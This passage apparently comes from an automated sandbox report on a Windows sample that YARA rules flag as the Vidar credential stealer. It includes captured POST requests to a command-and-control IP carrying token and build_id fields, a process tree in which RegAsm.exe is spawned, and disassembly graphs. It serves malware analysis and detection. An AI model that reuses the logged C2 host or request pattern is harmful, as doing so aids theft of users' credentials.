                                                                                                                                                                                                                                      2024-04-23 19:44:31 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----CBFBGCGIJKJJKFIDBFCG
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 47 43 47 49 4a 4b 4a 4a 4b 46 49 44 42 46 43 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------CBFBGCGIJKJJKFIDBFCGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------CBFBGCGIJKJJKFIDBFCGCont
                                                                                                                                                                                                                                      2024-04-23 19:44:31 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.64973195.217.244.994432632C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-23 19:44:32 UTC262OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BFBGDGIDBAAEBFHJKJDG
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0
                                                                                                                                                                                                                                      Host: 95.217.244.99
                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      2024-04-23 19:44:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 35 32 33 61 61 36 36 33 35 62 30 32 62 32 35 64 33 33 30 66 32 31 30 64 64 39 38 32 37 62 62 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 32 61 39 36 31 35 33 66 65 65 66 65 38 39 63 66 33 39 66 39 37 64 30 32 61 32 30 30 31 65 30 31 0d 0a 2d 2d 2d 2d 2d 2d 42 46 42 47 44 47 49 44 42 41 41 45 42 46 48 4a 4b 4a 44 47 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                      Data Ascii: ------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="token"9523aa6635b02b25d330f210dd9827bb------BFBGDGIDBAAEBFHJKJDGContent-Disposition: form-data; name="build_id"2a96153feefe89cf39f97d02a2001e01------BFBGDGIDBAAEBFHJKJDGCont
                                                                                                                                                                                                                                      2024-04-23 19:44:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                      Date: Tue, 23 Apr 2024 19:44:33 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-23 19:44:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                                                                                      Click to jump to process

                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:21:43:53
                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                                                                                                                                      Imagebase:0x450000
                                                                                                                                                                                                                                      File size:1'135'104 bytes
                                                                                                                                                                                                                                      MD5 hash:C7CB10EADCCA31C88538F972FD657590
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:1
                                                                                                                                                                                                                                      Start time:21:43:53
                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                      Imagebase:0xee0000
                                                                                                                                                                                                                                      File size:65'440 bytes
                                                                                                                                                                                                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.2461081989.000000000055F000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:21:43:53
                                                                                                                                                                                                                                      Start date:23/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4092 -s 356
                                                                                                                                                                                                                                      Imagebase:0x6f0000
                                                                                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Reset < >

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:0.1%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                        Total number of Nodes:6
                                                                                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                                                                                        execution_graph 63598 46d1b0 63599 46d1de 63598->63599 63600 46d2be VirtualProtectEx 63599->63600 63601 46d2ee 63600->63601 63602 46d31a GlobalFree RegEnableReflectionKey 63601->63602 63603 46d32e 63602->63603

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • VirtualProtectEx.KERNELBASE(000000FF,00553018,000004AC,00000040,?,?), ref: 0046D2D9
                                                                                                                                                                                                                                        • GlobalFree.KERNELBASE(00000000), ref: 0046D31B
                                                                                                                                                                                                                                        • RegEnableReflectionKey.ADVAPI32(00000000), ref: 0046D323
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: EnableFreeGlobalProtectReflectionVirtual
                                                                                                                                                                                                                                        • String ID: A$O
                                                                                                                                                                                                                                        • API String ID: 99888042-2576515906
                                                                                                                                                                                                                                        • Opcode ID: fc12df978631e20c7fd83328fe4f12caf4c6d419f1725b2de0f681d49c4aba81
                                                                                                                                                                                                                                        • Instruction ID: 5e87df59d59c7f211764bf590a7e83237b9146c70052bfb6fd64d7421239ad96
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fc12df978631e20c7fd83328fe4f12caf4c6d419f1725b2de0f681d49c4aba81
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB51D571E00304AFDB00DFA4CC45BAEB7B0BF59305F14425AF905A7292EB74AA88DB55
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1408 4f39ca-4f39d7 1409 4f39dd-4f39e2 1408->1409 1410 4f3a7b-4f3a94 GetLocaleInfoW 1408->1410 1409->1410 1413 4f39e8-4f39ed 1409->1413 1411 4f3a9a-4f3a9f 1410->1411 1412 4f3a96-4f3a98 1410->1412 1414 4f3aa7-4f3aaa 1411->1414 1415 4f3aa1 GetACP 1411->1415 1412->1414 1416 4f39ef-4f39f5 1413->1416 1415->1414 1417 4f39f7-4f39fa 1416->1417 1418 4f3a15-4f3a17 1416->1418 1419 4f39fc-4f3a04 1417->1419 1420 4f3a11-4f3a13 1417->1420 1421 4f3a1a-4f3a1c 1418->1421 1419->1418 1422 4f3a06-4f3a0f 1419->1422 1420->1421 1421->1410 1423 4f3a1e-4f3a23 1421->1423 1422->1416 1422->1420 1424 4f3a25-4f3a2b 1423->1424 1425 4f3a2d-4f3a30 1424->1425 1426 4f3a49-4f3a4b 1424->1426 1427 4f3a4e-4f3a50 1425->1427 1428 4f3a32-4f3a3a 1425->1428 1426->1427 1430 4f3a72-4f3a79 call 455a7e 1427->1430 1431 4f3a52-4f3a6b GetLocaleInfoW 1427->1431 1428->1426 1429 4f3a3c-4f3a45 1428->1429 1429->1424 1433 4f3a47 1429->1433 1430->1414 1431->1412 1434 4f3a6d-4f3a70 1431->1434 1433->1427 1434->1414
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 004F3A63
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004F3A8C
                                                                                                                                                                                                                                        • GetACP.KERNEL32 ref: 004F3AA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                        • Opcode ID: bc46fceabc0627a590841cbfc670d23a7b43a8bb3251792e7d8635b8c6e57a83
                                                                                                                                                                                                                                        • Instruction ID: 3766f62bc86efbd7ad8fddb2b1f66c0cdae23b120c92d34bd2fedbcf617f469f
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc46fceabc0627a590841cbfc670d23a7b43a8bb3251792e7d8635b8c6e57a83
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AD21D672F00108AADB34CF56C900AB773A6AB50F52B568026EB8AD7310F736DF41C754
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 1564 4f3c13-4f3c69 call 4543a4 * 2 1569 4f3c6b-4f3c6e 1564->1569 1570 4f3c8a-4f3c91 1564->1570 1569->1570 1571 4f3c70-4f3c88 call 4f3b9a 1569->1571 1572 4f3c93-4f3c96 1570->1572 1573 4f3d01-4f3d05 1570->1573 1571->1570 1572->1573 1577 4f3c98-4f3c9c 1572->1577 1574 4f3d18-4f3d28 GetUserDefaultLCID 1573->1574 1575 4f3d07-4f3d0a 1573->1575 1579 4f3d2b 1574->1579 1575->1574 1578 4f3d0c-4f3d16 call 4f3380 1575->1578 1581 4f3cae-4f3cb2 call 4f34c3 1577->1581 1582 4f3c9e-4f3ca1 1577->1582 1578->1579 1585 4f3d2d-4f3d31 1579->1585 1589 4f3cb7-4f3cbc 1581->1589 1582->1581 1586 4f3ca3-4f3cac call 4f3402 1582->1586 1590 4f3d46-4f3d62 call 4f39ca 1585->1590 1591 4f3d33 1585->1591 1586->1589 1593 4f3d44 1589->1593 1594 4f3cc2-4f3cdb call 4f3b9a 1589->1594 1590->1591 1600 4f3d64-4f3d70 IsValidCodePage 1590->1600 1595 4f3d35-4f3d43 call 4530df 1591->1595 1593->1590 1594->1579 1604 4f3cdd-4f3ce3 1594->1604 1600->1591 1603 4f3d72-4f3d7f IsValidLocale 1600->1603 1603->1591 1605 4f3d81-4f3d86 1603->1605 1606 4f3cf5-4f3cf9 call 4f34c3 1604->1606 1607 4f3ce5-4f3ce8 1604->1607 1608 4f3d8a-4f3da0 call 454f8e 1605->1608 1609 4f3d88 1605->1609 1614 4f3cfe-4f3cff 1606->1614 1607->1606 1610 4f3cea-4f3cf3 call 4f3402 1607->1610 1617 4f3da2-4f3dc7 call 454f8e GetLocaleInfoW 1608->1617 1618 4f3e00-4f3e03 1608->1618 1609->1608 1610->1614 1614->1585 1617->1591 1621 4f3dcd-4f3de6 GetLocaleInfoW 1617->1621 1618->1595 1621->1591 1622 4f3dec-4f3dfd call 4544e9 1621->1622 1622->1618
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32 ref: 004F3D1F
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004F3D68
                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 004F3D77
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004F3DBF
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 004F3DDE
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3475089800-0
                                                                                                                                                                                                                                        • Opcode ID: 5cf7db4145e4032dbf6df8f735dfca5b74d3de87e1908553ea509182de649dba
                                                                                                                                                                                                                                        • Instruction ID: dd92aec6972557c5ea7570e73a193ef1bbafe7b0eef3aaa2d457ce8090588483
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5cf7db4145e4032dbf6df8f735dfca5b74d3de87e1908553ea509182de649dba
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8F519172A0020DABEB10DFA5DC41ABB77B8EF44702F04442AEA05EB291D7789B45CB65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                        • API String ID: 0-2761157908
                                                                                                                                                                                                                                        • Opcode ID: cc6e17db20f6a6b70f9e3b4120f22d071ffd4ae76a386f84ae8120e622ee9101
                                                                                                                                                                                                                                        • Instruction ID: d1bfef63d338fc6042ebb7b97e80c5b83f8cf25296f15e08dedc2166a2ed1639
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc6e17db20f6a6b70f9e3b4120f22d071ffd4ae76a386f84ae8120e622ee9101
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8FD22572E0822C8BDB65CE28CD407EAB7B5EB44305F1441EAD94DE7240EB7CAE858F45
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • GetACP.KERNEL32 ref: 004F30F8
                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 004F3123
                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 004F3304
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_450000_file.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CodeInfoLocalePageValid
                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                        • API String ID: 790303815-905460609
                                                                                                                                                                                                                                        • Opcode ID: 9b674373b97886307bd62c4105cb1ff41c02340a7c4246cfa8eca2f322ee2527
                                                                                                                                                                                                                                        • Instruction ID: 9908c1145b6cf321fad8a1ab99bd7acd835e7a2d31e5f607ce554f9be6648a9c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9b674373b97886307bd62c4105cb1ff41c02340a7c4246cfa8eca2f322ee2527
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C5710871640209AAD724AF76CD46BB773E8EF44706F10406BFA05D7281EA78EE448769
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2129715506.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129698467.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.000000000045C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000460000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129715506.0000000000503000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129816930.000000000050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129866299.0000000000553000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129899709.000000000055D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000562000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2129916941.0000000000564000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
